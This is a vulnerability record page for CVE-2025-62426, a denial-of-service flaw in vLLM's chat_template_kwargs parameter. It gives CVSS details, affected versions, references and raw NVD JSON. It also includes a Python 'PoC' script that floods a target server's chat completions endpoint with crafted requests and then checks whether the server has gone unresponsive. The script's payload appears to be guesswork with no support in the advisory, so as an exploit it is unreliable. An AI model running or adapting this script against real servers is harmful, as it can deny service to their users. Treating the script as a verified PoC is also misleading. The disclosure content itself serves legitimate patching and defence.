CVE-2025-62426

Description

vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:* - VULNERABLE

vLLM >= 0.5.5 且 < 0.11.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-62426 PoC - vLLM chat_template_kwargs DoS
This PoC demonstrates the denial of service vulnerability in vLLM's 
chat_template_kwargs parameter handling.
"""

import requests
import json
import time
import concurrent.futures

TARGET_URL = "http://target-server:8000/v1/chat/completions"

def trigger_dos():
    """
    Send a malicious request with crafted chat_template_kwargs
    to trigger long processing time.
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer YOUR_API_KEY"
    }
    
    # Craft malicious payload with problematic chat_template_kwargs
    payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [
            {"role": "user", "content": "Hello"}
        ],
        # Malicious chat_template_kwargs that triggers DoS
        "chat_template_kwargs": {
            "loop_trigger": True,
            "nested_data": {"level1": {"level2": {"level3": {"level4": {"level5": "x" * 1000}}}}
        }
    }
    
    try:
        response = requests.post(
            TARGET_URL,
            headers=headers,
            json=payload,
            timeout=5
        )
        print(f"Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("Request timed out - DoS successful")
    except Exception as e:
        print(f"Error: {e}")

def verify_dos():
    """
    Verify that the server is unresponsive after DoS attack.
    """
    normal_payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [{"role": "user", "content": "Hi"}]
    }
    
    try:
        response = requests.post(
            TARGET_URL,
            json=normal_payload,
            timeout=10
        )
        return response.status_code == 200
    except:
        return False

if __name__ == "__main__":
    print("[*] Starting CVE-2025-62426 DoS attack...")
    
    # Send multiple malicious requests
    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        futures = [executor.submit(trigger_dos) for _ in range(3)]
        concurrent.futures.wait(futures)
    
    print("[*] Verifying server availability...")
    time.sleep(2)
    
    if not verify_dos():
        print("[+] DoS confirmed - Server is unresponsive")
    else:
        print("[-] Server still responsive")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62426
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62426
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62426/
[4] VulDB https://vuldb.com/cve/CVE-2025-62426
[5] https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610
[6] https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814
[7] https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b
[8] https://github.com/vllm-project/vllm/pull/27205
[9] https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62426", "sourceIdentifier": "[email protected]", "published": "2025-11-21T02:15:43.570", "lastModified": "2025-12-04T17:42:10.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.5.5", "versionEndExcluding": "0.11.1", "matchCriteriaId": "BA1047E1-ED1E-4685-B699-8CE5B2058D87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:*", "matchCriteriaId": "FEE054E1-1F84-4ACC-894C-D7E3652EF1B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "B05850DF-38FE-439F-9F7A-AA96DA9038CC"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/27205", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}